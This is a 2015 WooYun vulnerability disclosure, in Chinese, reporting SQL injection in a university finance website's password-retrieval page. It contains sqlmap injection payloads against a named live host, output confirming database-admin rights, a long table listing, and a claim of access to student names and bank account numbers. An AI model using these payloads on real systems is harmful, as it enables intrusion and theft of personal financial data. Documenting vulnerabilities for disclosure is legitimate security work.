当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091170

漏洞标题:湖南科技大学财务网存在post型注入

相关厂商:湖南科技大学

漏洞作者: 路人甲

提交时间:2015-01-13 14:49

修复时间:2015-01-18 14:50

公开时间:2015-01-18 14:50

漏洞类型:系统/服务运维配置不当

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-13: 细节已通知厂商并且等待厂商处理中
2015-01-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

‘sa’权限不忍直视了。学生信息,和银行账号信息都有啊!!(-__-)

详细说明:

页面:http://cwc.hnust.cn/pay/getpass.asp

1.jpg


加个' 提交 ,出错了

1.jpg


抓包:

1.jpg


提交的数据可以看到了。
直接sqlmap。

漏洞证明:

Parameter: username (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=1212020202' AND 7443=7443 AND 'yDal'='yDal
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: username=-9863' UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(113)+CHAR
(113)+CHAR(113)+CHAR(87)+CHAR(97)+CHAR(119)+CHAR(82)+CHAR(87)+CHAR(69)+CHAR(104)
+CHAR(122)+CHAR(73)+CHAR(107)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(113),
NULL--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: username=1212020202'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: username=1212020202' WAITFOR DELAY '0:0:5'--
---
[03:48:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[03:48:13] [INFO] testing if current user is DBA
current user is DBA:    True
[03:48:13] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[03:48:13] [INFO] fetched data logged to text files under 'C:\Users\ERIC\.sqlmap
\output\cwc.hnust.cn'


还是dba

[03:53:04] [INFO] testing if current user is DBA
current user is DBA:    True


再看了下有多少库

1.jpg


随便找个库就有 250个表了

Database: xssf5
[246 tables]
+--------------------+
| DM_UF_MX           |
| DM_UF_MX           |
| FS_RECORD          |
| LX_DM              |
| LX_SFB1            |
| LX_SFB1            |
| LX_SFMX            |
| PBJDM              |
| PBJSFBZ            |
| PBMDM              |
| PCXKC              |
| PDJBH              |
| PDKLX              |
| PDWDY              |
| PDWLXDM            |
| PDWSJX             |
| PEXPORT_LM         |
| PEXPORT_LM         |
| PFSSFXM            |
| PFXDM              |
| PGNDM              |
| PGSDY              |
| PIMPORT_LM         |
| PIMPORT_LM         |
| PJSFSDM            |
| PJ_LYB             |
| PJ_MXB             |
| PKCDM              |
| PMKDM              |
| PMZDM              |
| PQUERY_FIELD_TMP   |
| PQUERY_FIELD_TMP   |
| PQUERY_FIELD_TMP   |
| PQUERY_TABLE       |
| PQUERY_TJ          |
| PQUERY_TMP         |
| PQXDM_FX           |
| PQXDM_FX           |
| PSCWJDY            |
| PSFQJDZ            |
| PSFQJDZ            |
| PSFXMLX            |
| PSFXMLX            |
| PSFYXJ             |
| PTXXX              |
| PXQDM              |
| PXSDM_BAK          |
| PXSDM_BAK          |
| PXSLB              |
| PXSLY              |
| PXSSFBZ_MX         |
| PXSSFBZ_MX         |
| PXSTZ_MX           |
| PXSXZ              |
| PXSZT              |
| PXTCS              |
| PXXXX              |
| PYHCWDM            |
| PYHDM              |
| PYHSSZ             |
| PYHZDM             |
| PYSKZY             |
| PYYDM              |
| PZBLM              |
| PZCBZB             |
| PZJLB              |
| PZYDM              |
| PZYLXDM            |
| SF_BBDY_MX         |
| SF_BBDY_MX         |
| SF_CESFDB          |
| SF_CESFDMX         |
| SF_CXFB            |
| SF_CXFMX           |
| SF_DJGL            |
| SF_HJDB_DEL        |
| SF_HJDB_DEL        |
| SF_HJDMX_DEL       |
| SF_HJDMX_DEL       |
| SF_JMDB_BAK        |
| SF_JMDB_BAK        |
| SF_JMDB_DEL        |
| SF_JMDMX_BAK       |
| SF_JMDMX_BAK       |
| SF_JMDMX_DEL       |
| SF_LOG             |
| SF_PZMB1           |
| SF_PZMB1           |
| SF_PZMBGS          |
| SF_PZMBMX          |
| SF_QYB             |
| SF_SFDB_BAK        |
| SF_SFDB_BAK        |
| SF_SFDB_DEL        |
| SF_SFDB_RY         |
| SF_SFDDC           |
| SF_SFDMX_BAK       |
| SF_SFDMX_BAK       |
| SF_SFDMX_DEL       |
| SF_SFDMX_DY        |
| SF_SFDMX_RY        |
| SF_SFDY_LOG        |
| SF_SFD_DY          |
| SF_SFD_FP          |
| SF_SSDK_PL         |
| SF_SSDK_PL         |
| SF_SSDK_QY         |
| SF_SS_YH           |
| SF_TFDB_BAK        |
| SF_TFDB_BAK        |
| SF_TFDB_DEL        |
| SF_TFDDC           |
| SF_TFDMX_BAK       |
| SF_TFDMX_BAK       |
| SF_TFDMX_DEL       |
| SF_TFD_FP          |
| SF_XESFDB          |
| SF_XESFDMX         |
| SF_XXDL            |
| SF_YHDS_LSH        |
| SF_YHDS_TKB        |
| SF_YHDS_XF         |
| SF_YSKBZ           |
| SF_YSKTZ_MX_BAK    |
| SF_YSKTZ_MX_BAK    |
| SF_YSK_BAK         |
| SF_YSK_BAK         |
| SF_YSK_CD          |
| SF_YSK_DK          |
| SF_YSK_FP          |
| SF_YSK_TMP         |
| SF_ZXDKBZ          |
| SF_ZZ_BAK          |
| SF_ZZ_BAK          |
| T_zs_ylpos_tmp     |
| T_zs_ylpos_tmp     |
| V_CXFXS            |
| V_CXMXZ            |
| V_HJMXZ            |
| V_JMD              |
| V_JMDXS            |
| V_JMLXMXZ          |
| V_JMLXXS           |
| V_JMMXZ_LS         |
| V_JMMXZ_LS         |
| V_SFD              |
| V_SFDXS            |
| V_SFLXMXZ_LS       |
| V_SFLXMXZ_LS       |
| V_SFLXXS           |
| V_SFLXZZ           |
| V_SFLXZZXS         |
| V_SFMXZ_LS         |
| V_SFMXZ_LS         |
| V_SFZZ             |
| V_SFZZXS           |
| V_TABLE            |
| V_TFD              |
| V_TFDXS            |
| V_TFLXMXZ          |
| V_TFLXXS           |
| V_TFMXZ_LS         |
| V_TFMXZ_LS         |
| V_XESFLXMXZ        |
| V_XESFMXZ          |
| V_XSDM             |
| V_YSKLX            |
| V_YSKLX            |
| V_YSKLXXS          |
| V_YSKXS            |
| V_jfxxb            |
| WY_SSDK            |
| XF_XFGL_TMP        |
| XF_XFGL_TMP        |
| ckd_xyp            |
| dtproperties       |
| gs_table           |
| nfsf2_bjdmzs       |
| nfsf2_pjnmb        |
| nfsf2_plog         |
| nfsf2_pxtcs        |
| nfsf2_vzz          |
| nfsf2_xsdmzs       |
| nfsf_vsfzz         |
| pjgl_glb           |
| pjgl_lyb           |
| pjgl_mxb           |
| seed               |
| sf_jks_temp        |
| sf_jsfsb           |
| sf_jzhj            |
| sf_pkyh            |
| sf_poslog          |
| sf_qfqk_htemp1     |
| sf_sgpjzhj         |
| sf_sqltj           |
| sf_xtrz            |
| sf_yhpk_ls         |
| sf_yhpk_mx         |
| sf_yhpk_temp       |
| sf_yhyjfk          |
| sysconstraints     |
| syssegments        |
| sysxszdkz          |
| t_zs_czwh          |
| t_zs_dlyhwh        |
| t_zs_dtwh          |
| t_zs_dwdz          |
| t_zs_dwpjgj        |
| t_zs_dwxmgj        |
| t_zs_ggb           |
| t_zs_jzhjxx        |
| t_zs_pjkpxx        |
| t_zs_pjls_tmp      |
| t_zs_pjls_tmp      |
| t_zs_pjwh          |
| t_zs_pjzl          |
| t_zs_srlb          |
| t_zs_xmxx          |
| t_zs_ypsq          |
| t_zs_zgwh          |
| t_zs_zsdw          |
| temp_bmbjxztjb_xyp |
| temp_bmjfqkb_xyp   |
| temp_bmrshzb_xyp   |
| temp_sfqkzhtjb_xyp |
| temp_xsysfhzb_xyp  |
| tmp_jq             |
| txs13              |
| tzf14              |
| tzj14              |
| tzs                |
| v_cxfzz            |
| wy_bank            |
| wy_bwjg            |
| wy_bwlx            |
| wy_bwlxzddy        |
| wy_fs              |
| wy_js              |
| wy_pagid           |
| wy_xxdl            |
| wy_yh_xtcs         |
| xe_mxz             |
| xe_sfzz            |
| xe_zh              |
| 客户编号
+--------------------+



由于表名都是拼音缩写不好辨认,就随便试了几张表
学号 银行账号姓名...数量很大,从05年到现在几乎都有

1.jpg


脱裤的就不感兴趣了~,走人!

修复方案:

过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-01-18 14:50

厂商回复:

最新状态:

暂无